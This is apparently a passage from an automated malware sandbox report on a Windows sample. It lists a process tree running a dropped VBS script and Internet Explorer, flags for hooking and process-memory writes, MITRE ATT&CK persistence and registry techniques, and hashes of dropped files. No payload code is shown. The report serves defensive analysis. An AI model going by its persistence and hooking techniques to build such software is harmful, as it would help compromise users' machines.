      Suspicious use of SetWindowsHookEx
      PID:1560
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\winsoft9\1.vbs"
  2⤵
  PID:1508

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1832
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1832 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:628

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\winsoft9\1.vbs

Filesize
161B

MD5
d0d0d3b167b1e1820fa44aca6d47c909

SHA1
531be3e9881e6750630d451aa03529e39574ffd7

SHA256
49727a292c8f46d692df67986e8b8223b9e2244fc7658c2655a71968d2117f77

SHA512
968858b1efef99e1f65f364b3ee807e13dede7dfd8b804668da0540d0c1ab0d27cf4774bd62fa62a7b283dddb9dcfffeb713a1d1c05bb890df25aeca9ae070bf

Download Submit
C:\Program Files (x86)\winsoft9\bho.exe

Filesize
65KB

MD5
4ba9a7d68cf22eef4354e6695b14109c

SHA1
20b6adf9febd22fa74662bf8dfd5a4f5803eda38

SHA256
9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

SHA512
907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

Download Submit
C:\Program Files (x86)\winsoft9\game.ico

Filesize
14KB

MD5
b67620aa1f5cb8f80251d09ff9588240

SHA1
d74aaba8f94c29c5357b616c12e35dfcb19ed8b6

SHA256
ad688cfdddcc87c272b7326236451a38a5465a28e004b6d88a00c71d3978cf94

SHA512
c3776167680533f4da82d988c04a0832e40bb15028a5828881da92b8d0072f95fa567b3e320a3dab407c930f80b1dc088ca6567426d8cab94a2ac24622e806a9

Download Submit
C:\Program Files (x86)\winsoft9\t2.exe

Filesize
12.9MB

MD5
49e5951f4588503f978ffd05490a37ec

SHA1
708ad83c54027909e89c9bb64eb506a0bfbf916a

SHA256
426160318c9e0319e3b5c61307ae95440f1ddcc0b6708069d41bb8b6accec247

SHA512
263b78cce4b70c238b1edea1b667614742cd420e1c1fb7d155c4c6f0979e7ed66e4bc79f1dd88dabb30b7bfe466cd890fcc86de92fad1545ea2fb58120bd614e

Download Submit
C:\Program Files (x86)\winsoft9\taobao.ico

Filesize
2KB

MD5
c2b91f0dc93589c254a84ecea95aa4f1

SHA1
03a527beb4f64b7175fd84a7a6d712921dabc4a6

SHA256
ac195cd6d4feafd10d4a34d766297bc7766fe00afcddc89305143fa043f35149

SHA512
fb7103e7da7df7b2f91a1f6c03608870bb7e41a3967029ce73248f95f331e0e6178fd266cd03fd373db7782f50cb38de14af1604e60189955add198ef3c17c9a

Download Submit
C:\Program Files (x86)\winsoft9\test.exe

Filesize
13.0MB

MD5
02054374886ce17b40f2bbdfa192bb51

SHA1
4e7b1dc2e7f37392cd9717d40eff89d86a678b27

SHA256
e241e3fd28efbfaa5a59087e1d1291dc26c3b786ebc0fe83caed7f9074909034

SHA512
2a2a1184c19bac51e8109bdbc162864b58040d5f1a469b23262f6f6f52c4f960d45c13c6c240e144a3ddaa0a0f09251e66186eadf93252b8c803aefbb2e1594f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7AE77CB1-74E4-11ED-AFAE-66397CAA4A34}.dat

Filesize
4KB

MD5
9a432817ea2ff8199cf8cfac981061df

SHA1
2e3dff77f9852338e04fd1484c39230359ac715d

SHA256
579b0601420f837454333c436cde0bfbe01de9e8ee75667579169fa8fc96ba0e

SHA512
8ba7ad1fd84d023ce4376bc028ebadfce14c2de32117c9c196660342031c5ff20af29131856cd791dbce2187bc755f0c13bc5b2ec0eb091593e000b05f3ba05a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7B2C8490-74E4-11ED-AFAE-66397CAA4A34}.dat

Filesize
5KB

MD5
138784f7ef44bc46c17e115bc87df160

SHA1
30e8663fe2f1ea674a454955fb9a9007800b19d6

SHA256
a462adde7fde876ccbd780c132b68ebe6fec7ae93736746ffb5ce8f2944a255b

SHA512
bbd49d3a2967558ef456dd3a176f75e732794b04f76240147475f8556e9abaf523b7e7f3d6aca57e96251be583e2b73ed4c9342060db6f1564d0bd6e227360ce

Download Submit
\??\c:\program files (x86)\winsoft9\t2.exe

Filesize
12.9MB

MD5
49e5951f4588503f978ffd05490a37ec

SHA1
708ad83c54027909e89c9bb64eb506a0bfbf916a

SHA256
426160318c9e0319e3b5c61307ae95440f1ddcc0b6708069d41bb8b6accec247

SHA512
263b78cce4b70c238b1edea1b667614742cd420e1c1fb7d155c4c6f0979e7ed66e4bc79f1dd88dabb30b7bfe466cd890fcc86de92fad1545ea2fb58120bd614e

Download Submit
\Program Files (x86)\winsoft9\bho.exe

Filesize
65KB

MD5
4ba9a7d68cf22eef4354e6695b14109c

SHA1
20b6adf9febd22fa74662bf8dfd5a4f5803eda38

SHA256
9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

SHA512
907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

Download Submit
\Program Files (x86)\winsoft9\bho.exe

Filesize
65KB

MD5
4ba9a7d68cf22eef4354e6695b14109c

SHA1
20b6adf9febd22fa74662bf8dfd5a4f5803eda38

SHA256
9e57af5d4f49661f342fc3e3f77db9b5d04cc861d1c102c44bfb663e9a167fee

SHA512
907c73851032ab3ac07ea33bcba794bfce3c429787e34e5e85724c9011abad6277b235613db6da8ecd47619327b2cff14af89792943f248282f7a5e386aa85ac

Download Submit
\Program Files (x86)\winsoft9\t2.exe

Filesize
12.9MB

MD5
49e5951f4588503f978ffd05490a37ec

SHA1
708ad83c54027909e89c9bb64eb506a0bfbf916a

SHA256
426160318c9e0319e3b5c61307ae95440f1ddcc0b6708069d41bb8b6accec247

SHA512
263b78cce4b70c238b1edea1b667614742cd420e1c1fb7d155c4c6f0979e7ed66e4bc79f1dd88dabb30b7bfe466cd890fcc86de92fad1545ea2fb58120bd614e

Download Submit
\Program Files (x86)\winsoft9\t2.exe

Filesize
12.9MB

MD5
49e5951f4588503f978ffd05490a37ec

SHA1
708ad83c54027909e89c9bb64eb506a0bfbf916a

SHA256
426160318c9e0319e3b5c61307ae95440f1ddcc0b6708069d41bb8b6accec247

SHA512
263b78cce4b70c238b1edea1b667614742cd420e1c1fb7d155c4c6f0979e7ed66e4bc79f1dd88dabb30b7bfe466cd890fcc86de92fad1545ea2fb58120bd614e

Download Submit
\Program Files (x86)\winsoft9\test.exe

Filesize
13.0MB

MD5
02054374886ce17b40f2bbdfa192bb51

SHA1
4e7b1dc2e7f37392cd9717d40eff89d86a678b27

SHA256
e241e3fd28efbfaa5a59087e1d1291dc26c3b786ebc0fe83caed7f9074909034

SHA512
2a2a1184c19bac51e8109bdbc162864b58040d5f1a469b23262f6f6f52c4f960d45c13c6c240e144a3ddaa0a0f09251e66186eadf93252b8c803aefbb2e1594f

Download Submit
\Program Files (x86)\winsoft9\test.exe

Filesize
13.0MB

MD5
02054374886ce17b40f2bbdfa192bb51

SHA1
4e7b1dc2e7f37392cd9717d40eff89d86a678b27

SHA256
e241e3fd28efbfaa5a59087e1d1291dc26c3b786ebc0fe83caed7f9074909034

SHA512
2a2a1184c19bac51e8109bdbc162864b58040d5f1a469b23262f6f6f52c4f960d45c13c6c240e144a3ddaa0a0f09251e66186eadf93252b8c803aefbb2e1594f

Download Submit
memory/1768-82-0x0000000000400000-0x0000000000A29000-memory.dmp

Filesize
6.2MB

Download
memory/1768-79-0x0000000000400000-0x0000000000A29000-memory.dmp

Filesize
6.2MB

Download
memory/1996-54-0x0000000076031000-0x0000000076033000-memory.dmp

Filesize
8KB

Download
memory/1996-59-0x0000000000A20000-0x0000000000A41000-memory.dmp

Filesize
132KB

Download
memory/1996-57-0x0000000000A20000-0x0000000000A41000-memory.dmp

Filesize
132KB

Download
memory/1996-74-0x0000000003000000-0x0000000003629000-memory.dmp

Filesize
6.2MB

Download
memory/2012-86-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/2012-87-0x0000000004BB0000-0x0000000005C12000-memory.dmp

Filesize
16.4MB

Download
memory/2012-72-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download